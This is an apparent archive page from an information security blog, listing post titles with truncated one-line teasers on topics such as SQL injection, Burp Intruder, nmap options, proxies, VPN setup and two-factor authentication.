America is wide open and trusting. This shouldn’t change. The idea of stopping…
Mature Visual Analysis
From raffy.ch: Data Collection: No data, no visuals (see also Where Data Analytics…
Who Makes the Best Web Security Testers?
There’s been some debate in my circles recently on the topic of what type…
Three Proxy Options Every Security Pro Should Consider Using
Working in the information security field it’s frequently handy to be able…
Linkclump for Web Testing
Anyone who does web security testing knows that the browser is the most important…
A Response to Dinis Cruz’ Comments on Invisible Security
Dinis Cruz did a presentation at OWASP recently on why security should be invisible…
Why Lock Technology Stagnated for Decades
At BSides-LasVegas this year I saw an exemplary talk on the history of lock technology…
SQL Injection is 90% SQL, WebSec is 90% WebDev
I believe too many people take the wrong approach to security, or “hacking”.…
Life > Fear
I recently decided to give Xobni for GMail a try. It does some wicked integration…
A Social Media Security Model
I am often asked how I handle handle security while using social networks. This…
Burp Intruder Payload Methods Explained
If you use Burp a good bit you’ve likely run into the question of what precisely…
How to Connect to an Astaro SSL VPN using OS X
I’ve been stupid for Astaro since the early 00’s and I remain so today.…
Bypassing a Web Proxy Using Chrome on OS X
It’s highly annoying when you are trying to read or download something at…
Determining a Personal Data Retention Strategy
If you spent any time in the IT world you’re likely to be particularly tuned…
Blog Spam’s Latest Technique: Flattery
Over the last few months I’ve been noticing a trend in blog spam: The use…
How to Use WPA-2 Enterprise in Windows 7
WPA-2 Enterprise is pretty sweet. It allows you to require an Active Directory…
Operating Systems Used by DEFCON CTF Teams [Poll]
I was hanging out in the CTF room today at DEFCON enjoying the hilarious videos…
Restricting Access to Your Git Directory
One task you need to be sure to do when implementing git on a website is to make…
PayPal and Two-Factor Authentication: A “Weakest Link” Case in Point
I am an enthusiastic user of the Verisign PIP two-factor authentication service.…
Mac vs. PC Security In One Sentence
If you follow Information Security at all or have been part of a PC vs. Mac discussion…
Segmented Web Browsing Will Be the DMZ of the 2010’s
The recent AURORA attack is about to change how the web browser is handled within…
A Fantasy Explanation of Standard vs. Blind SQL Injection
Many in InfoSec get confused about the difference between standard and blind SQL…
4 Ways Terrorist Profiling is Like Antivirus
Both can be bypassed by smart attackers who know they’re being profiled.…
My Twitter Infosec List
I am really looking forward to the potential of Twitter Lists. Here’s my…
Nmap: Use the –top-ports Option for Both TCP and UDP Simultaneously
I’m a big fan of nmap‘s –top-ports option, which gives you the…
